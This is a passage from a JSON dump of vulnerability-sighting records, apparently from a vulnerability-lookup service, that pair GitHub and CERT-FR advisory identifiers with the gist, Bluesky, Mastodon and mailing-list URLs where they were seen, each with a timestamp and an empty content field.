"https://bsky.app/profile/hnbot.gsuscs.xyz/post/3ltjdwo3vv22c", "content": "", "creation_timestamp": "2025-07-09T08:00:44.851446Z"}, {"uuid": "bfa2c455-83c0-4101-bee4-f38bddf0f579", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/396b308f20908edb02e9db13b738604b", "content": "", "creation_timestamp": "2025-07-16T03:48:35.000000Z"}, {"uuid": "6505e0a3-4972-4329-a7ef-25bf194e691b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/396b308f20908edb02e9db13b738604b", "content": "", "creation_timestamp": "2025-07-16T03:48:35.000000Z"}, {"uuid": "10e21b18-6c0d-43f0-8082-760984272de4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/fdf514c7394888db5e4a269fcebb346b", "content": "", "creation_timestamp": "2025-07-16T03:50:36.000000Z"}, {"uuid": "82040dbf-28ec-4c36-acd5-18f6723636a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/e39dcfe3eb5f5feb41d1528795aab73a", "content": "", "creation_timestamp": "2025-07-16T08:34:49.000000Z"}, {"uuid": "09d10895-2178-4ef6-8794-50fa3c6cf853", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/d34d89e62ed41902a6e632df1c8d020e", "content": "", "creation_timestamp": "2025-07-16T10:32:38.000000Z"}, {"uuid": "23fe71b5-dc1e-4a38-b41f-c2ec05c42269", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/16ec053e1cd33d590eb15d4d9bab394c", "content": "", "creation_timestamp": "2025-07-16T12:40:11.000000Z"}, {"uuid": "a2c5fea5-744f-4588-9713-59c8387e86a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/ef184347803e15dac9646caefc82d2d0", "content": "", "creation_timestamp": "2025-07-16T13:34:57.000000Z"}, {"uuid": "c7b558b5-1597-4240-88eb-2bf1944b80a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fmj2-7wx8-qj4v", "type": "seen", "source": "https://gist.github.com/safer-bot/ef184347803e15dac9646caefc82d2d0", "content": "", "creation_timestamp": "2025-07-16T13:34:57.000000Z"}, {"uuid": "836f493d-73b4-4c57-afe7-0e38bf2285f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/a17a415f7a1fd6c4a885cd5ee0694347", "content": "", "creation_timestamp": "2025-07-16T14:37:35.000000Z"}, {"uuid": "0b60bed1-c76c-4de9-a7ba-68c3f5990075", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-557j-xg8c-q2mm", "type": "seen", "source": "https://bsky.app/profile/hnfeed.bsky.social/post/3ltje2w3mon2j", "content": "", "creation_timestamp": "2025-07-09T08:03:07.355626Z"}, {"uuid": "67681daa-43ed-4aa8-8b76-90a0d83e7583", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4hjx-54gf-2jh7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114835706474485725", "content": "", "creation_timestamp": "2025-07-11T17:10:22.538105Z"}, {"uuid": "a3dd2cf3-4070-4557-96fa-7ec6d29e08d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hfrx-6qgj-fp6c", "type": "seen", "source": "https://gist.github.com/safer-bot/f6680196cf1b0aee1c5fa9abea2ce0e1", "content": "", "creation_timestamp": "2025-07-16T03:54:14.000000Z"}, {"uuid": "04ac2dc8-9245-40c9-8d70-85b62a7a3b48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/f6680196cf1b0aee1c5fa9abea2ce0e1", "content": "", "creation_timestamp": "2025-07-16T03:54:14.000000Z"}, {"uuid": "041c4a92-5b6f-4284-a485-46e5481169fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4p4p-vq2v-9489", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114797506148304132", "content": "", "creation_timestamp": "2025-07-04T23:15:32.582334Z"}, {"uuid": "085c15b0-0699-4395-9f16-928e8542e804", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j975-95f5-7wqh", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114797511485377082", "content": "", "creation_timestamp": "2025-07-04T23:16:53.682021Z"}, {"uuid": "2cc9e792-2b7b-4d63-ba81-2e06f4d62f4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/6c269ab5efbc1b35aaebd08f44e939f4", "content": "", "creation_timestamp": "2025-07-16T03:56:27.000000Z"}, {"uuid": "4d5b7848-be2d-47a6-aa17-49edf65dffc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/6c269ab5efbc1b35aaebd08f44e939f4", "content": "", "creation_timestamp": "2025-07-16T03:56:27.000000Z"}, {"uuid": "3ce70154-a008-457e-a396-9606465da5ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/377e11baa0869e0b381b07a3d7ed6e90", "content": "", "creation_timestamp": "2025-07-16T10:34:44.000000Z"}, {"uuid": "56af6762-32a6-4e03-b337-0abbb7a2184a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/377e11baa0869e0b381b07a3d7ed6e90", "content": "", "creation_timestamp": "2025-07-16T10:34:44.000000Z"}, {"uuid": "73f0f094-967a-41f4-9c4c-d1220fa5c1ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/377e11baa0869e0b381b07a3d7ed6e90", "content": "", "creation_timestamp": "2025-07-16T10:34:44.000000Z"}, {"uuid": "9eb3c980-25db-4c74-a805-20c0e308b7d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/377e11baa0869e0b381b07a3d7ed6e90", "content": "", "creation_timestamp": "2025-07-16T10:34:44.000000Z"}, {"uuid": "d49beae8-0de6-48fd-8001-2589cb8b205e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/1caaae65aa52f2baea445a2c8e5e649a", "content": "", "creation_timestamp": "2025-07-16T13:34:25.000000Z"}, {"uuid": "4f07d612-3ffe-462b-8242-ebe0c6270116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/1caaae65aa52f2baea445a2c8e5e649a", "content": "", "creation_timestamp": "2025-07-16T13:34:25.000000Z"}, {"uuid": "70fa3fac-b709-420b-97a9-769f03ca3165", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3qhf-m339-9g5v", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114797511485377082", "content": "", "creation_timestamp": "2025-07-04T23:16:53.826207Z"}, {"uuid": "9c30192e-4ec6-44cf-b357-8d5c9a51a465", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/24c020ed9d2c5206c5029cfb25825bf0", "content": "", "creation_timestamp": "2025-07-16T10:38:12.000000Z"}, {"uuid": "1f7dbb73-9795-4084-b572-3c8e6388b9e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6mjq-h674-j845", "type": "seen", "source": "https://gist.github.com/safer-bot/24c020ed9d2c5206c5029cfb25825bf0", "content": "", "creation_timestamp": "2025-07-16T10:38:12.000000Z"}, {"uuid": "b0f4f2b8-13fb-49fb-9472-d39d1efa6aa6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mfj5-cf8g-g2fv", "type": "seen", "source": "https://gist.github.com/safer-bot/24c020ed9d2c5206c5029cfb25825bf0", "content": "", "creation_timestamp": "2025-07-16T10:38:12.000000Z"}, {"uuid": "aa4c0f7c-427b-4f5c-8145-5a5256c6b276", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/719e7a7a4ddc83e6257d4845b085759a", "content": "", "creation_timestamp": "2025-07-16T13:37:25.000000Z"}, {"uuid": "7d7952cc-4723-407b-b900-a3381601bad7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/719e7a7a4ddc83e6257d4845b085759a", "content": "", "creation_timestamp": "2025-07-16T13:37:25.000000Z"}, {"uuid": "8252de2e-c4e3-4300-8bff-00949c93f0d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/719e7a7a4ddc83e6257d4845b085759a", "content": "", "creation_timestamp": "2025-07-16T13:37:25.000000Z"}, {"uuid": "a1db3df1-a252-4c78-82e9-d3c39203693d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/719e7a7a4ddc83e6257d4845b085759a", "content": "", "creation_timestamp": "2025-07-16T13:37:25.000000Z"}, {"uuid": "d7bdb7bb-4df0-4e96-afd0-acb856907e18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/16d0b45f6c38b7c78a69e322490eed27", "content": "", "creation_timestamp": "2025-07-16T14:21:14.000000Z"}, {"uuid": "06bdc66e-5241-4006-bcea-55a3bbfbb440", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/16d0b45f6c38b7c78a69e322490eed27", "content": "", "creation_timestamp": "2025-07-16T14:21:14.000000Z"}, {"uuid": "c23f6526-017b-4b2c-b03e-a60ad32d03c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73m2-qfq3-56cx", "type": "seen", "source": "https://gist.github.com/safer-bot/16d0b45f6c38b7c78a69e322490eed27", "content": "", "creation_timestamp": "2025-07-16T14:21:14.000000Z"}, {"uuid": "6ffb51fe-fa93-4fef-ac8b-967d7b549b33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/eb06cf73ab4b31488ab7dc0dce411aa4", "content": "", "creation_timestamp": "2025-07-16T04:07:36.000000Z"}, {"uuid": "eee7e2f0-81b0-4f46-854b-15d3986d2078", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/24c020ed9d2c5206c5029cfb25825bf0", "content": "", "creation_timestamp": "2025-07-16T10:38:12.000000Z"}, {"uuid": "dc558720-adfb-42d5-b4cd-4e15bc0015a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/24c020ed9d2c5206c5029cfb25825bf0", "content": "", "creation_timestamp": "2025-07-16T10:38:12.000000Z"}, {"uuid": "96ca56d9-c82b-4af8-9da5-589c4b6d1488", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/719e7a7a4ddc83e6257d4845b085759a", "content": "", "creation_timestamp": "2025-07-16T13:37:25.000000Z"}, {"uuid": "59938c24-46d3-4bc7-998c-2b6ba8ef0dc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3f7h-mf4q-vrm4", "type": "seen", "source": "https://gist.github.com/safer-bot/719e7a7a4ddc83e6257d4845b085759a", "content": "", "creation_timestamp": "2025-07-16T13:37:25.000000Z"}, {"uuid": "c839d543-136b-407a-8836-9ca837614807", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-009", "type": "seen", "source": "https://bsky.app/profile/cti-news.bsky.social/post/3lsw4cjtezy2z", "content": "", "creation_timestamp": "2025-07-01T16:23:37.510216Z"}, {"uuid": "be696c5b-6ccc-4239-98df-1357a8a94d29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-009", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114778923372621366", "content": "", "creation_timestamp": "2025-07-01T16:29:44.482762Z"}, {"uuid": "ccb052e3-4dcb-45ab-807e-8ef883e36875", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/72e2ae22b849f38c7eb9074b72b979b0", "content": "", "creation_timestamp": "2025-07-16T04:09:29.000000Z"}, {"uuid": "e7515fc0-9ec4-4f41-906d-924e80dcf09d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/72e2ae22b849f38c7eb9074b72b979b0", "content": "", "creation_timestamp": "2025-07-16T04:09:29.000000Z"}, {"uuid": "b2f7e4be-457f-474a-9ebd-7aebe883580d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/72e2ae22b849f38c7eb9074b72b979b0", "content": "", "creation_timestamp": "2025-07-16T04:09:29.000000Z"}, {"uuid": "32447a29-f298-4751-b8c7-7eb132206e7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/72e2ae22b849f38c7eb9074b72b979b0", "content": "", "creation_timestamp": "2025-07-16T04:09:29.000000Z"}, {"uuid": "e21f7e2d-17f8-4494-a2b4-b1b8c2d6d4c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/72e2c848f21b34ec979e22db8468c8b5", "content": "", "creation_timestamp": "2025-07-16T12:39:11.000000Z"}, {"uuid": "02d7e23b-b44e-4c6e-9527-bb68a990f548", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/ef184347803e15dac9646caefc82d2d0", "content": "", "creation_timestamp": "2025-07-16T13:34:57.000000Z"}, {"uuid": "99b0c277-f418-4b47-9fd5-db9ad112668a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-557j-xg8c-q2mm", "type": "seen", "source": "https://bsky.app/profile/betterhn50.e-work.xyz/post/3ltjc4mof4j25", "content": "", "creation_timestamp": "2025-07-09T07:28:17.262100Z"}, {"uuid": "d174d63e-6cb5-4d4b-b360-5a4da4353348", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/8f2e58493283a6c6411154498679d5b3", "content": "", "creation_timestamp": "2025-07-16T03:45:12.000000Z"}, {"uuid": "f606cb56-87fe-40fb-b97f-a6ce98f84faa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3x8x-79m2-3w2w", "type": "seen", "source": "https://gist.github.com/safer-bot/805a0de180caecb98379377b3f053467", "content": "", "creation_timestamp": "2025-07-16T08:32:34.000000Z"}, {"uuid": "eafc0d07-14a6-4b23-9ea4-7bf7c9cbc791", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/805a0de180caecb98379377b3f053467", "content": "", "creation_timestamp": "2025-07-16T08:32:34.000000Z"}, {"uuid": "66527243-df0e-4c95-8083-3f2d2f399d58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3x8x-79m2-3w2w", "type": "seen", "source": "https://gist.github.com/safer-bot/6428f4e82456989e69180d6bca28d722", "content": "", "creation_timestamp": "2025-07-16T10:31:30.000000Z"}, {"uuid": "d4ac5445-af0f-4c72-a5f3-dc5514aa7a31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/6428f4e82456989e69180d6bca28d722", "content": "", "creation_timestamp": "2025-07-16T10:31:30.000000Z"}, {"uuid": "9703f948-f323-4c6f-b1cf-f5030855b146", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/6428f4e82456989e69180d6bca28d722", "content": "", "creation_timestamp": "2025-07-16T10:31:30.000000Z"}, {"uuid": "c512248f-1d98-4a16-b497-cd82a75a815d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/7e3b85e8b84c5dcb279423309a77b3ff", "content": "", "creation_timestamp": "2025-07-16T12:38:39.000000Z"}, {"uuid": "d5232dde-3015-406c-9aaf-3a1162b45b50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/ef184347803e15dac9646caefc82d2d0", "content": "", "creation_timestamp": "2025-07-16T13:34:57.000000Z"}, {"uuid": "1608a2cd-67b4-4fda-bb06-2a6edf58fc63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/ef184347803e15dac9646caefc82d2d0", "content": "", "creation_timestamp": "2025-07-16T13:34:57.000000Z"}, {"uuid": "2358be3b-1777-455b-9541-a184d83e9ffe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/8f576481ae0b25c2f9292db6db5e2aa7", "content": "", "creation_timestamp": "2025-07-16T03:46:52.000000Z"}, {"uuid": "e47e6877-52e6-45b6-a789-dfa042f104fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qcwq-55hx-v3vh", "type": "seen", "source": "https://gist.github.com/safer-bot/8f576481ae0b25c2f9292db6db5e2aa7", "content": "", "creation_timestamp": "2025-07-16T03:46:52.000000Z"}, {"uuid": "66a047b6-1c99-4094-a1bc-a8a734764e47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/8f576481ae0b25c2f9292db6db5e2aa7", "content": "", "creation_timestamp": "2025-07-16T03:46:52.000000Z"}, {"uuid": "1da301ab-c8cd-4f89-912f-5f473a56d1fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/805a0de180caecb98379377b3f053467", "content": "", "creation_timestamp": "2025-07-16T08:32:34.000000Z"}, {"uuid": "3671f0a9-0589-4d57-91ee-d29df1299ee0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-288c-cq4h-88gq", "type": "seen", "source": "https://gist.github.com/safer-bot/805a0de180caecb98379377b3f053467", "content": "", "creation_timestamp": "2025-07-16T08:32:34.000000Z"}, {"uuid": "7c550209-17a8-4997-8589-009379adb75d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pvp8-3xj6-8c6x", "type": "seen", "source": "https://gist.github.com/safer-bot/6428f4e82456989e69180d6bca28d722", "content": "", "creation_timestamp": "2025-07-16T10:31:30.000000Z"}, {"uuid": "46e68f42-29da-4f51-9b32-4f89ebf331f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/6428f4e82456989e69180d6bca28d722", "content": "", "creation_timestamp": "2025-07-16T10:31:30.000000Z"}, {"uuid": "f33edce9-f05f-491e-9244-f74f66667a8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/affe11bf7ae62145d9b738badc0cc5b2", "content": "", "creation_timestamp": "2025-07-16T12:40:43.000000Z"}, {"uuid": "98e27bb2-d52e-4c3f-b545-0882cabd9b72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/affe11bf7ae62145d9b738badc0cc5b2", "content": "", "creation_timestamp": "2025-07-16T12:40:43.000000Z"}, {"uuid": "0e11b12a-6dfb-4430-9ed0-862f69426d2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/affe11bf7ae62145d9b738badc0cc5b2", "content": "", "creation_timestamp": "2025-07-16T12:40:43.000000Z"}, {"uuid": "414e06ff-43e8-4fa1-9507-dbead896362c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/273", "content": "", "creation_timestamp": "2025-06-23T23:32:45.000000Z"}, {"uuid": "28012982-438b-4b3a-925d-681d12dd290a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-76h9-2vwh-w278", "type": "seen", "source": "https://gist.github.com/safer-bot/0a516166b329057e81ec35ad6fb00e3b", "content": "", "creation_timestamp": "2025-07-16T03:56:59.000000Z"}, {"uuid": "c79c93d2-cb8f-40d1-817e-4638144899ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/6c269ab5efbc1b35aaebd08f44e939f4", "content": "", "creation_timestamp": "2025-07-16T03:56:27.000000Z"}, {"uuid": "28d6d959-998c-4a03-9706-a6dc37bde399", "vulnerability_lookup_origin": 